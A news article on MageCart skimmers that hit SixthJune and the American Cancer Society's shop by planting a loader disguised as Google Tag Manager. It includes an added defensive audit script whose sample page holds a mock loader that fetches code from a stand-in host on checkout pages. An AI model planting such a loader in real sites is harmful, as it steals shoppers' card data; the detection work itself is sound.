Digital payment skimmer group is found targeting Cancer.org and SixthJune.com customer credit card data
Multiple security researchers have revealed new MageCart payment skimmer attacks that pose a serious risk to the affected sites' customers. It seems that the French online fashion store SixthJune and the shopping site of the American Cancer Society were hit around the same time. The reports became public only a few days after similar news about the popular skincare brand First Aid Beauty appeared.
These attacks are mainly called MageCart skimmers because the initial technique involves the Magento e-commerce platform. The attack infects the site with code that steals payment card information from the person at the checkout.
The security researcher Jenkins was the first to mention the Sixth June hack, in a Twitter post. At almost the same time, another expert discovered a similar attack using malicious code planted in the e-store that belongs to the American Cancer Society.
According to researchers, the malicious component was hidden in a fake Google Tag Manager snippet. Google Tag Manager allows site owners to manage and deploy marketing tags without having to change the source code. All of the compromised sites showed variants of this fake snippet, although the hosts were different. Willem de Groot stated:
The Cancer.org skimmer loader hides itself by hiding behind the (legitimate) GoogleTagManager code. It searches for “checkout” and will then load the actual skimming code.
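A site owner can check a saved copy of a page for the two traits described above: a snippet that presents itself as Google Tag Manager but loads from another host, or that tests for "checkout". The following is an added example, not code from the article or the researchers; the allow-list, function names and sample page are assumptions made for illustration.

```javascript
// Added example (not from the article): heuristic audit for GTM look-alike scripts.
// ALLOWED_HOSTS is an assumption; extend it if your GTM is served from another domain.
const ALLOWED_HOSTS = new Set(['www.googletagmanager.com']);

// Pull every <script> element out of a saved page (regex is enough for an audit pass).
function extractScripts(html) {
  const scripts = [];
  for (const m of html.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Hostnames referenced by absolute or protocol-relative URLs in a string.
function hostsIn(text) {
  const found = text.matchAll(/(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi);
  return [...new Set([...found].map((m) => m[1].toLowerCase()))];
}

// Flag scripts that present themselves as GTM but load from another host
// or branch on the word "checkout", the two traits reported for this loader.
function auditGtmSnippets(html) {
  const findings = [];
  extractScripts(html).forEach((s, index) => {
    const text = (s.src || '') + ' ' + s.body;
    if (!/gtm|googletagmanager|dataLayer/i.test(text)) return;
    const reasons = [];
    const foreign = hostsIn(text).filter((h) => !ALLOWED_HOSTS.has(h));
    if (foreign.length) reasons.push('non-GTM host: ' + foreign.join(', '));
    if (/checkout/i.test(s.body)) reasons.push('inline code tests for "checkout"');
    if (reasons.length) findings.push({ index, reasons });
  });
  return findings;
}

// Constructed sample page: [0] GTM-style snippet on the genuine host, [1] a look-alike, [2] a site script.
const SAMPLE_HTML = `
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),
event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-XXXX');</script>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];if(/checkout/.test(w.location.href)){
var j=d.createElement(s);j.src='//gtm.example.invalid/gtm.js?id='+i;d.head.appendChild(j);}
})(window,document,'script','dataLayer','GTM-XXXX');</script>
<script src="/static/app.js"></script>`;

console.log(JSON.stringify(auditGtmSnippets(SAMPLE_HTML), null, 2));
```

This is a triage heuristic over static HTML: it does not see scripts injected at runtime, so a clean result does not clear a page.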
A rapid spike in such activities shows that e-skimmers continue to pose a danger
Unfortunately, these sites are not the first victims. Various researchers who have investigated MageCart scripts reported being surprised by the lack of response after notifying founders and companies that their services had been hacked. In most cases, the malicious scripts continued to run even after the researchers had notified the companies multiple times. The Sixth June incident was spotted during a larger investigation that uncovered more than 80 different sites showing similar behavior.
Hackers can purchase anything under the name of the cardholder
Reports based on analyzed payloads give more specific details about the information that MageCart collects and uses after the attack. The following information, which is what is needed to make online purchases, can be obtained:
- name printed on the card;
- expiration date;
- card number;
- the CVV security number on the back of the card.
Nevertheless, data like email addresses, usernames, passwords, physical addresses, and phone numbers can also be stolen from particular accounts during the attack. When the criminal obtains such information, he can log into any account and reroute the order to any other place. MageCart started to work in global promotions two years ago and later on targeted companies like OXO and Newegg.